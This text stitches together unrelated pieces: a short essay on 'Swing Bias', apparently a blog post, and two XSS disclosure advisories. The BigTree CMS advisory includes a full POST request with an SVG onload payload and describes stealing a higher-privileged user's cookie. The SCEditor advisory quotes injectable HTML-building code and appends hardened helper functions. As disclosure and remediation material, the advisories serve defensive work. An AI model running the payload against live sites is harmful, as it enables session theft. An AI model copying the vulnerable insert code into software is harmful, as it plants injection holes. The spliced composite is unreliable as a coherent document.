Swing Bias

Swing Bias occurs when a person starts with an original thesis, swings to the opposing view to avoid confirmation bias, realizes they may have overcorrected, and swings back to the original thesis.

***

Confirmation bias is the tendency to believe in things that align with our existing beliefs. It influences our daily search, interpretation, and recollection of information. Schools teach this bias to help students develop critical thinking skills.

However, there are second-order effects to this bias.

Since we are aware that confirmation bias exists, we have to consider opposing viewpoints to ensure our evaluation is well-rounded.

We can begin by identifying obvious points that are on the extreme opposite end. These points fall into the category of known-unknowns, where we simply invert our current viewpoint.

However, points along the spectrum live in the realm of unknown-unknowns.

As a result, we rely on readily available information for our research. For example, both our online searches and the people we speak to are biased.

Consider this: our primary source of information is search engines, which rank information based on what their engineers deem useful for consumers. How can a search engine truly understand a user's intent and determine what is useful?

The role of a search engine is to determine what is most useful to the majority.

This bias also extends to the people we engage with for discussions. Even when considering the viewpoints of experts in a particular field, not all of them are accessible for a discussion. As such, our discussion points are biased towards the experts who are more available.

Adding to the complexity, most viewpoints fall along a spectrum rather than sitting at opposite ends. This means that, in addition to identifying these points (if we can even identify them), the influence they have on a thesis needs to be weighted. And of course, the weighting assigned to these viewpoints is itself biased.

Balancing all of these factors is more of an art than a science.

While gathering information on opposing viewpoints, we may inadvertently overcorrect our original thesis, resulting in a counter-confirmation bias.

Now that we are aware of this possibility, there is nothing preventing us from overcorrecting again.

BigTree CMS – XSS Vulnerability in Version 4.4.7

Product Information:

Software: BigTree CMS

Tested Version: 4.4.7, released 16.10.2019

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: BigTree is an extremely extensible open-source CMS built on PHP and MySQL. (excerpt copied from https://www.bigtreecms.org/)


The following is a POST request to create a tag with the payload:

POST /admin/tags/create/ HTTP/1.1
Host: demo.bigtreecms.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: https://demo.bigtreecms.org
Connection: close
Referer: https://demo.bigtreecms.org/admin/tags/add/
Cookie: PHPSESSID=giqced7qd6sqkrb6i2tdndbvl1; bigtree_admin[page_properties_open]=on;
bigtree_admin[email][email protected];
bigtree_admin[login]=["session-5e419446c4d265.05914498","chain-5e419446c4c097.13460452"]
Upgrade-Insecure-Requests: 1

tag="><svg/onload=alert(/xss/)/>

Impact:

A user with tag-adding capability is able to steal the cookie of another user with higher privilege.


Solution:

  • Update to BigTree CMS version 4.4.9.

Timeline:

Vulnerability found: 11.02.2020

Vendor informed: 11.02.2020

Vendor responded: 13.02.2020

Bug fixed: 28.02.2020

Version 4.4.9 released: 06.03.2020

Public Advisory: 06.04.2020


References:

https://github.com/bigtreecms/BigTree-CMS/commit/7a588580958c74dbb820991d37d7b3c8f0843668

https://github.com/bigtreecms/BigTree-CMS/commit/c34c2a7623d153549e63188eadf7ff40200b8b11

[CVE-2019-19466] SCEditor – XSS Vulnerability in Version 2.1.3

Product Information:

Software: SCEditor

Tested Version: 2.1.3, released 04.05.2018

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: A lightweight, open source, WYSIWYG BBCode and (X)HTML editor. (copied from https://www.sceditor.com/)


Vulnerability description:

There are 3 XSS vulnerabilities in SCEditor version 2.1.3.

The following are the three default features which are vulnerable to XSS:

  1. Insert image
  2. Insert email
  3. Insert link

The relevant code can be found in /src/lib/defaultCommands.js.

editor.wysiwygEditorInsertHtml(
  '<img' + attrs + ' src="' + url + '" />' // line 505
);
editor.wysiwygEditorInsertHtml(
  '<a href="' + 'mailto:' + email + '">' + // line 550
    (text || email) +
  '</a>'
);
editor.wysiwygEditorInsertHtml(
  '<a href="' + url + '">' + text + '</a>' // line 610
);
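Added example, not SCEditor's own code: hardened counterparts of the three inserts above that encode for the attribute and text contexts, restrict href/src to http(s), and require a plain mailbox for the mailto: target (the same attribute-context encoding would neutralize the tag payload in the BigTree advisory above). The function names, the numeric width/height parameters and the assumed editor.wysiwygEditorInsertHtml sink are assumptions.

```javascript
// Added example, not SCEditor's own code: hardened versions of the three
// insert helpers; the sink editor.wysiwygEditorInsertHtml is assumed, not called.
// Encode for HTML text and double-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
// Only http(s) URLs may reach href/src. Control characters and whitespace are
// stripped first: browsers skip them in the scheme, so "java\tscript:" counts.
function safeUrl(url) {
  const cleaned = String(url).replace(/[\u0000-\u0020\u007f]/g, '');
  return /^https?:\/\//i.test(cleaned) ? cleaned : null;
}
// Minimal mailbox check: one "@", no whitespace, quotes or angle brackets.
function safeEmail(email) {
  const e = String(email).trim();
  return /^[^\s@"'<>]+@[^\s@"'<>]+$/.test(e) ? e : null;
}
// Replaces '<img' + attrs + ' src="' + url + '" />' (line 505); width and
// height are validated as positive integers instead of a caller-built string.
function buildImageHtml(url, width, height) {
  const src = safeUrl(url);
  if (src === null) return null;
  let attrs = '';
  for (const [name, raw] of [['width', width], ['height', height]]) {
    if (raw == null || raw === '') continue;
    const n = Number(raw);
    if (!Number.isInteger(n) || n <= 0) return null;
    attrs += ' ' + name + '="' + n + '"';
  }
  return '<img' + attrs + ' src="' + escapeHtml(src) + '" />';
}
// Replaces the mailto: anchor built at line 550.
function buildEmailHtml(email, text) {
  const addr = safeEmail(email);
  if (addr === null) return null;
  return '<a href="mailto:' + escapeHtml(addr) + '">' + escapeHtml(text || addr) + '</a>';
}
// Replaces '<a href="' + url + '">' + text + '</a>' (line 610).
function buildLinkHtml(url, text) {
  const href = safeUrl(url);
  if (href === null) return null;
  return '<a href="' + escapeHtml(href) + '">' + escapeHtml(text || href) + '</a>';
}
```

Each builder returns null on rejected input so the caller can refuse the insert instead of falling back to the raw value.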

Impact:

The 3 identified DOM-based XSS vulnerabilities have limited impact and depend on how these variables are used. Projects implementing SCEditor should take extra care to ensure proper sanitization.


Solution:

  • Sanitize the variables mentioned in the vulnerability description section.

Timeline:

Vulnerability found: 01.09.2019

Vendor informed: 01.09.2019 & 26.11.2019

Public Advisory: 05.12.2019 (90 days since initial contact had passed)


References:

https://github.com/samclarke/SCEditor/commit/7fd14aecc6f0c68f1e8bb98b12f6f0da769c671a – reference for the latest version